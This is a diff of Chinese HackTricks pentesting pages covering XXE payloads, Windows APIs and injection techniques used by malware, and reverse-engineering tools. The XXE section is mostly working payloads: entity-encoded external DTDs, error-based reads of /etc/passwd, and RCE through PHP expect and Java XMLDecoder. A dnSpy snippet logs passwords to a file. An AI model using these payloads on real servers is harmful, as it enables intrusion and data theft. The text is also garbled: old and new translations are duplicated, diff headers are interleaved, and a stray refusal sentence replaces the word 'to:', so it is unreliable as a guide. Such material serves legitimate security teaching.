请注意,使用的 **HTML 实体** 需要是 **数字**(如 \[在这个例子中]\([https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,%27Numeric%20entities%27%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B\)%5C)).
```xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x3E;" >%a;%dtd;]>
<data>
@ -450,7 +461,7 @@ DTD 示例:
%abt;
%exfil;
```
## PHP包装器
## PHP Wrappers
### Base64
@ -464,7 +475,7 @@ DTD 示例:
```
### 远程代码执行
**如果加载了 PHP "expect" 模块**
**如果加载了 PHP "expect" 模块**
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
@ -474,21 +485,19 @@ DTD 示例:
<pass>mypass</pass>
</creds>
```
## **SOAP - XEE**
## **SOAP - XEE**
```xml
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
```
## XLIFF - XXE
这个例子受到了[https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe](https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe)的启发。
这个例子灵感来源于 [https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe](https://pwn.vg/articles/2021-06/local-file-read-via-error-based-xxe)
XLIFFXML本地化交换文件格式用于标准化本地化过程中的数据交换。是一种基于XML的格式主要用于在本地化过程中在工具之间传输可本地化数据并作为CAT计算机辅助翻译工具的常见交换格式。
XLIFFXML本地化交换文件格式用于标准化本地化过程中的数据交换。是一种基于XML的格式主要用于在本地化过程中在工具之间传输可本地化数据并作为计算机辅助翻译CAT工具的通用交换格式。
### 盲目请求分析
### Blind Request Analysis
向服务器发以下内容的请求:
向服务器发送了以下内容的请求:
```xml
------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
@ -500,13 +509,13 @@ Content-Type: application/x-xliff+xml
<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
```
然而,这个请求触发了一个内部服务器错误,明确指出标记声明存在问题:
然而,此请求触发了内部服务器错误,特别提到标记声明的问题:
```json
{"status":500,"error":"Internal Server Error","message":"Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."}
```
尽管出现错误,但在Burp Collaborator上记录了一次命中表明与外部实体有一定程度的交互。
尽管出现错误,但在 Burp Collaborator 上记录到了一次命中,表明与外部实体有某种程度的交互。
带外数据泄露 为了将数据外泄,发送了一个修改过的请求:
带外数据泄露 为了泄露数据,发送了一个修改过的请求:
```
------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
@ -518,9 +527,9 @@ Content-Type: application/x-xliff+xml
<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
```
这种方法揭示了用户代理指示使用Java 1.8。Java的这个版本存在一个已知限制即无法使用带有换行符的文件例如/etc/passwd来检索文件使用带外技术
这种方法表明用户代理指示使用 Java 1.8。这个版本的 Java 的一个显著限制是无法使用带外技术检索包含换行符的文件,例如 /etc/passwd
基于错误的数据泄露为了克服这个限制采用了基于错误的方法。DTD文件的结构如下以触发包含目标文件数据的错误
基于错误的数据外泄 为了克服这个限制采用了基于错误的方法。DTD 文件的结构如下,以触发包含目标文件数据的错误:
```xml
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/'>">
@ -531,22 +540,22 @@ Content-Type: application/x-xliff+xml
```javascript
{"status":500,"error":"Internal Server Error","message":"IO error.\nReason: /nofile (No such file or directory)"}
```
为了在错误消息中包含文件内容需要调整DTD文件
要在错误消息中包含文件的内容DTD 文件被调整
```xml
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/%data;'>">
%foo;
%xxe;
```
这种修改导致文件内容成功外泄因为它反映在通过HTTP发送的错误输出中。这表明成功利用XXEXML外部实体攻击利用带外和基于错误的技术来提取敏感信息。
此修改导致文件内容的成功外泄因为它反映在通过HTTP发送的错误输出中。这表明成功进行了XXEXML外部实体攻击利用了带外和基于错误的技术来提取敏感信息。
## RSS - XEE
有效的XML格式具有RSS格式用于利用XXE漏洞。
有效的RSS格式XML以利用XXE漏洞。
### 回显
### Ping back
向攻击者服务器发出的简单HTTP请求
简单HTTP请求到攻击者服务器
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
@ -613,9 +622,9 @@ Content-Type: application/x-xliff+xml
```
## Java XMLDecoder XEE to RCE
XMLDecoder是一个Java类它根据XML消息创建对象。如果恶意用户可以让应用程序在调用方法**readObject**时使用任意数据,他将立即在服务器上获得代码执行权限。
XMLDecoder 是一个 Java 类,它根据 XML 消息创建对象。如果恶意用户能够让应用程序在调用 **readObject** 方法时使用任意数据,他将立即获得服务器上的代码执行权限。
### 使用Runtime().exec()
### Using Runtime().exec()
```xml
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
@ -645,8 +654,6 @@ XMLDecoder是一个Java类它根据XML消息创建对象。如果恶意用户
</object>
</java>
```
### ProcessBuilder
### ProcessBuilder
```xml
<?xml version="1.0" encoding="UTF-8"?>
@ -685,7 +692,7 @@ XMLDecoder是一个Java类它根据XML消息创建对象。如果恶意用户
* [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf)\\
* [https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html](https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html)\\
* 通过使用自己的外部 DTD 从 HTTP 中提取信息: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/)\\
* 通过 HTTP 使用自定义外部 DTD 提取信息: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/)\\
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection)\\
* [https://gist.github.com/staaldraad/01415b990939494879b4](https://gist.github.com/staaldraad/01415b990939494879b4)\\
* [https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9](https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9)\\
@ -696,16 +703,17 @@ XMLDecoder是一个Java类它根据XML消息创建对象。如果恶意用户
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,20 +1,21 @@
# 常用于恶意软件中的API
# 常见的恶意软件使用的API
{% hint style="success" %}
学习和实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我们在**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github库提交PR分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
**努力安全小组**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -39,7 +40,7 @@
### 持久性
| 注册表 | 文件 | 服务 |
| 注册表 | 文件 | 服务 |
| ---------------- | ------------- | ---------------------------- |
| RegCreateKeyEx() | GetTempPath() | OpenSCManager |
| RegOpenKeyEx() | CopyFile() | CreateService() |
@ -66,15 +67,15 @@
| GetSystemInfo() | IN() |
| GlobalMemoryStatusEx() | |
| GetVersion() | |
| CreateToolhelp32Snapshot \[检查进程是否在运行] | |
| CreateToolhelp32Snapshot \[检查进程是否在运行] | |
| CreateFileW/A \[检查文件是否存在] | |
### 隐
### 隐
| 名称 | |
| ------------------------ | -------------------------------------------------------------------------- |
| VirtualAlloc | 分配内存(压缩器) |
| VirtualProtect | 更改内存权限(使压缩器给予某个部分执行权限) |
| VirtualAlloc | 分配内存(打包器) |
| VirtualProtect | 更改内存权限(打包器给予某个部分执行权限) |
| ReadProcessMemory | 注入到外部进程 |
| WriteProcessMemoryA/W | 注入到外部进程 |
| NtWriteVirtualMemory | |
@ -103,8 +104,8 @@
* CreateToolhelp32Snapshot() -- 列出运行中的进程
* GetDC() -- 截图
* BitBlt() -- 截图
* InternetOpen()、InternetOpenUrl()、InternetReadFile()、InternetWriteFile() -- 访问互联网
* FindResource()、LoadResource()、LockResource() -- 访问可执行文件的资源
* InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetWriteFile() -- 访问互联网
* FindResource(), LoadResource(), LockResource() -- 访问可执行文件的资源
## 恶意软件技术
@ -112,66 +113,46 @@
在另一个进程中执行任意DLL
1. 定位要注入恶意DLL的进程CreateToolhelp32Snapshot、Process32First、Process32Next
2. 打开进程GetModuleHandle、GetProcAddress、OpenProcess
3. 将DLL路径写入进程VirtualAllocEx、WriteProcessMemory
4. 在进程中创建一个将加载恶意DLL的线程CreateRemoteThread、LoadLibrary
1. 定位要注入恶意DLL的进程CreateToolhelp32Snapshot, Process32First, Process32Next
2. 打开进程GetModuleHandle, GetProcAddress, OpenProcess
3. 在进程中写入DLL的路径VirtualAllocEx, WriteProcessMemory
4. 在进程中创建一个线程以加载恶意DLLCreateRemoteThread, LoadLibrary
其他要使用的函数NTCreateThreadEx、RtlCreateUserThread
其他可用的函数NTCreateThreadEx, RtlCreateUserThread
### 反射DLL注入
### 反射DLL注入
加载恶意DLL而无需调用常规的Windows API调用。\
DLL被映射到进程内部,将解析导入地址修复重定位并调用DllMain函数。
在不调用正常Windows API调用的情况下加载恶意DLL。\
DLL在进程中映射,它将解析导入地址修复重定位并调用DllMain函数。
### 线程劫持
找到进程中的线程并使其加载恶意DLL
从进程中找到一个线程并使其加载恶意DLL
1. 找到目标线程CreateToolhelp32Snapshot、Thread32First、Thread32Next
1. 找到目标线程CreateToolhelp32Snapshot, Thread32First, Thread32Next
2. 打开线程OpenThread
3. 暂停线程SuspendThread
4. 将恶意DLL的路径写入受害进程VirtualAllocEx、WriteProcessMemory
4. 在受害者进程中写入恶意DLL的路径VirtualAllocEx, WriteProcessMemory
5. 恢复加载库的线程ResumeThread
### PE注入
Portable Execution Injection可执行文件将被写入受害进程的内存中,并从那里执行。
可移植执行注入:可执行文件将被写入受害者进程的内存中,并从那里执行。
### 进程空
### 进程空
恶意软件将从进程的内存中取消映射合法代码并加载恶意二进制文件
1. 创建一个新进程CreateProcess
2. 取消映射内存ZwUnmapViewOfSectionNtUnmapViewOfSection
3. 将恶意二进制文件写入进程内存VirtualAllocEc、WriteProcessMemory
4. 设置入口点并执行SetThreadContextResumeThread
2. 取消映射内存ZwUnmapViewOfSection, NtUnmapViewOfSection
3. 在进程内存中写入恶意二进制文件VirtualAllocEc, WriteProcessMemory
4. 设置入口点并执行SetThreadContext, ResumeThread
## 钩子
* **SSDT**系统服务描述符表指向内核函数ntoskrnl.exe或GUI驱动程序win32k.sys因此用户进程可以调用这些函数。
* Rootkit可能会修改这些指针以指向他控制的地址
* **IRP**I/O请求数据包将数据片段从一个组件传输到另一个组件。几乎所有内核都使用IRP每个设备对象都有自己的函数表可以对其进行钩取DKOM直接内核对象操作
* **IAT**(导入地址表)有助于解析依赖项。可以钩取此表以劫持将要调用的代码。
* **EAT**(导出地址表)钩取。这些钩可以从**用户空间**完成。目标是钩取DLL导出的函数。
* **内联钩子**:这种类型很难实现。这涉及修改函数本身的代码。也许是在函数开头放置一个跳转。
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) **和** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **的GitHub存储库提交PR来分享您的黑客技巧。**
</details>
* **SSDT****系统服务描述符表**指向内核函数ntoskrnl.exe或GUI驱动程序win32k.sys以便用户进程可以调用这些函数。
* 根套件可能会修改这些指针以指向他控制的地址
* **IRP****I/O请求包**将数据片段从一个组件传输到另一个组件。几乎内核中的所有内容都使用IRP每个设备对象都有自己的函数表可以被钩住DKOM直接内核对象操作
* **IAT****导入地址表**)用于解析依赖关系。可以钩住此表以劫持将被调用的代码。
* **EAT****导出地址表**)钩子。此钩子可以从**用户空间**完成。目标是钩住DLL导出的函数。
* **内联钩子**:这种类型很难实现。这涉及修改函数本身的代码。可能通过在开头放置一个跳转来实现。

View file

@ -1,20 +1,21 @@
# 逆向工具和基本方法
# 反向工程工具与基本方法
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT收藏品](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
**努力安全小组**
<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -22,194 +23,193 @@
***
## 基于ImGui的逆向工具
## 基于 ImGui 的反向工程工具
软件:
* ReverseKit: [https://github.com/zer0condition/ReverseKit](https://github.com/zer0condition/ReverseKit)
## Wasm反编译器 / Wat编译器
## Wasm 反编译器 / Wat 编译器
在线工具
在线:
* 使用[https://webassembly.github.io/wabt/demo/wasm2wat/index.html](https://webassembly.github.io/wabt/demo/wasm2wat/index.html)将wasm二进制反编译为wat明文
* 使用[https://webassembly.github.io/wabt/demo/wat2wasm/](https://webassembly.github.io/wabt/demo/wat2wasm/)将wat编译为wasm
* 您也可以尝试使用[https://wwwg.github.io/web-wasmdec/](https://wwwg.github.io/web-wasmdec/)进行反编译
* 使用 [https://webassembly.github.io/wabt/demo/wasm2wat/index.html](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) wasm二进制**反编译** wat明文
* 使用 [https://webassembly.github.io/wabt/demo/wat2wasm/](https://webassembly.github.io/wabt/demo/wat2wasm/) wat **编译** wasm
* 你也可以尝试使用 [https://wwwg.github.io/web-wasmdec/](https://wwwg.github.io/web-wasmdec/) 进行反编译
软件:
* [https://www.pnfsoftware.com/jeb/demo](https://www.pnfsoftware.com/jeb/demo)
* [https://github.com/wwwg/wasmdec](https://github.com/wwwg/wasmdec)
## .NET反编译器
## .NET 反编译器
### [dotPeek](https://www.jetbrains.com/decompiler/)
dotPeek是一个反编译器,可以**反编译和检查多种格式**,包括**库**.dll、**Windows元数据文件**.winmd和**可执行文件**.exe。反编译后一个程序集可以保存为Visual Studio项目.csproj
dotPeek 是一个反编译器,能够**反编译和检查多种格式**,包括**库**.dll、**Windows 元数据文件**.winmd和**可执行文件**.exe。反编译后程序集可以保存为 Visual Studio 项目(.csproj
这里的优点是如果需要从旧程序集中恢复丢失的源代码此操作可以节省时间。此外dotPeek提供了方便的导航功能使其成为**Xamarin算法分析**的完美工具之一。
其优点在于如果丢失的源代码需要从遗留程序集恢复此操作可以节省时间。此外dotPeek 提供了便捷的导航功能,使其成为**Xamarin 算法分析**的完美工具之一。
### [.NET Reflector](https://www.red-gate.com/products/reflector/)
通过全面的插件模型和API.NET Reflector节省时间并简化开发。让我们看看这个工具提供的众多向工程服务:
通过全面的插件模型和扩展工具以满足您确切需求的 API.NET Reflector 节省时间并简化开发。让我们看看这个工具提供的众多向工程服务:
* 提供数据如何在库或组件中流动的见解
* 提供.NET语言和框架的实现和使用见解
* 查找未记录和未公开的功能以充分利用所使用的API和技术。
* 查找依赖项和不同的程序集
* 追踪代码中所有.NET代码的源代码的确切位置。
* 提供对数据如何在库或组件中流动的洞察
* 提供对 .NET 语言和框架的实现和使用的洞察
* 查找未记录和未公开的功能,以更好地利用所使用的 API 和技术
* 查找依赖关系和不同的程序集
* 精确定位代码、第三方组件和库中的错误
* 调试您所使用的所有 .NET 代码的源头
### [ILSpy](https://github.com/icsharpcode/ILSpy) & [dnSpy](https://github.com/dnSpy/dnSpy/releases)
[Visual Studio Code的ILSpy插件](https://github.com/icsharpcode/ilspy-vscode):您可以在任何操作系统中使用它您可以直接从VSCode安装无需下载git。单击**扩展**,然后**搜索ILSpy**)。\
如果您需要**反编译****修改**和**重新编译**,可以使用[**dnSpy**](https://github.com/dnSpy/dnSpy/releases)或其积极维护的分支[**dnSpyEx**](https://github.com/dnSpyEx/dnSpy/releases)。(右键单击 -> 修改方法**来更改函数内的内容)。
[ILSpy 插件用于 Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode):您可以在任何操作系统上使用它(您可以直接从 VSCode 安装,无需下载 git。点击 **扩展****搜索 ILSpy**)。\
如果您需要**反编译**、**修改**并**重新编译**,可以使用 [**dnSpy**](https://github.com/dnSpy/dnSpy/releases) 或其一个积极维护的分支 [**dnSpyEx**](https://github.com/dnSpyEx/dnSpy/releases)。(**右键点击 -> 修改方法**以更改函数内部的内容)。
### DNSpy日志记录
### DNSpy 日志记录
为了让**DNSpy在文件中记录一些信息**,您可以使用以下代码片段:
为了让 **DNSpy 记录一些信息到文件中**,您可以使用以下代码片段:
```cs
using System.IO;
path = "C:\\inetpub\\temp\\MyTest2.txt";
File.AppendAllText(path, "Password: " + password + "\n");
```
### DNSpy调试
### DNSpy 调试
要使用DNSpy调试代码,您需要:
为了使用 DNSpy 调试代码,您需要:
首先,更改与**调试**相关的**程序集属性**
首先,修改与 **调试** 相关的 **程序集属性**
![](<../../.gitbook/assets/image (973).png>)
```aspnet
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
```
至:
抱歉,我无法满足该请求。
```
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
DebuggableAttribute.DebuggingModes.DisableOptimizations |
DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
```
然后点击**编译**
然后点击 **compile**
![](<../../.gitbook/assets/image (314) (1).png>)
然后通过 _**文件 >> 保存模块...**_ 保存新文件:
然后通过 _**File >> Save module...**_ 保存新文件:
![](<../../.gitbook/assets/image (602).png>)
这是必要的,因为如果您不这样做,在**运行时**代码将应用几个**优化**,可能会导致在调试时**断点永远不会触发**或一些**变量不存在**
这是必要的,因为如果不这样做,在 **runtime** 时会对代码应用多个 **optimisations**,可能会导致在调试时 **break-point 从未被触发** 或某些 **variables 不存在**
然后,如果您的.NET应用程序正在由**IIS**运行,您可以使用以下方法**重新启动**它:
然后,如果你的 .NET 应用程序是由 **IIS** 运行的,你可以通过以下方式 **restart** 它:
```
iisreset /noforce
```
## 开始调试
然后,为了开始调试,您应该关闭所有打开的文件,并在**调试选项卡**中选择**附加到进程...**
然后,为了开始调试,您应该关闭所有打开的文件,并在 **Debug Tab** 中选择 **Attach to Process...**
![](<../../.gitbook/assets/image (318).png>)
然后选择**w3wp.exe**以附加到**IIS服务器**,并点击**附加**
然后选择 **w3wp.exe** 以附加到 **IIS server** 并点击 **attach**
![](<../../.gitbook/assets/image (113).png>)
现在我们正在调试该进程,是时候停止它并加载所有模块。首先点击_Debug >> Break All_然后点击_Debug >> Windows >> Modules_
现在我们正在调试该进程,是时候停止它并加载所有模块。首先点击 _Debug >> Break All_,然后点击 _**Debug >> Windows >> Modules**_
![](<../../.gitbook/assets/image (132).png>)
![](<../../.gitbook/assets/image (834).png>)
在**模块**中点击任何模块,然后选择**打开所有模块**
点击 **Modules** 中的任何模块并选择 **Open All Modules**
![](<../../.gitbook/assets/image (922).png>)
右键单击**程序集资源管理器**中的任何模块,然后点击**排序程序集**
右键点击 **Assembly Explorer** 中的任何模块并点击 **Sort Assemblies**
![](<../../.gitbook/assets/image (339).png>)
## Java反编译器
## Java 反编译器
[https://github.com/skylot/jadx](https://github.com/skylot/jadx)\
[https://github.com/java-decompiler/jd-gui/releases](https://github.com/java-decompiler/jd-gui/releases)
## 调试DLLs
## 调试 DLL
### 使用IDA
### 使用 IDA
* **加载rundll32**64位位于C:\Windows\System32\rundll32.exe32位位于C:\Windows\SysWOW64\rundll32.exe
* 选择**Windbg**调试器
* 选择“**在库加载/卸载时暂停**”
* **加载 rundll32**64位在 C:\Windows\System32\rundll32.exe32位在 C:\Windows\SysWOW64\rundll32.exe
* 选择 **Windbg** 调试器
* 选择 "**Suspend on library load/unload**"
![](<../../.gitbook/assets/image (868).png>)
* 配置执行的**参数**,放入**DLL的路径**和要调用的函数:
* 配置执行的 **参数**,输入 **DLL 的路径** 和您想要调用的函数:
![](<../../.gitbook/assets/image (704).png>)
然后,当您开始调试时,**每次加载DLL时执行将会停止**然后当rundll32加载您的DLL时执行将会停止。
然后,当您开始调试时,**每个 DLL 加载时执行将被停止**,然后,当 rundll32 加载您的 DLL 时,执行将被停止。
但是,您如何查看已加载的DLL的代码呢使用这种方法我不知道如何
但是,您如何才能到达已加载的 DLL 的代码呢?使用这种方法,我不知道怎么做
### 使用x64dbg/x32dbg
### 使用 x64dbg/x32dbg
* **加载rundll32**64位位于C:\Windows\System32\rundll32.exe32位位于C:\Windows\SysWOW64\rundll32.exe
* **更改命令行**_文件 --> 更改命令行_并设置dll的路径和要调用的函数例如“C:\Windows\SysWOW64\rundll32.exe” “Z:\shared\Cybercamp\rev2\\\14.ridii\_2.dll”,DLLMain
* 更改_Options --> Settings_并选择“**DLL入口**”
* 然后**开始执行**调试器将在每个dll主函数处停止最终您将**停在您的dll的dll入口处**。从那里,只需搜索要设置断点的位置
* **加载 rundll32**64位在 C:\Windows\System32\rundll32.exe32位在 C:\Windows\SysWOW64\rundll32.exe
* **更改命令行** _File --> Change Command Line_ )并设置 DLL 的路径和您想要调用的函数,例如:"C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\\14.ridii\_2.dll",DLLMain
* 更改 _Options --> Settings_ 并选择 "**DLL Entry**"
* 然后 **开始执行**,调试器将在每个 DLL 主函数处停止,在某个时刻您将 **停在您的 DLL 的 DLL 入口**。从那里,只需搜索您想要放置断点的点
请注意,当win64dbg由于任何原因停止执行时您可以在**win64dbg窗口顶部**看到**您所在的代码**
请注意,当执行因任何原因在 win64dbg 中停止时,您可以在 **win64dbg 窗口的顶部** 查看 **您正在查看的代码**
![](<../../.gitbook/assets/image (842).png>)
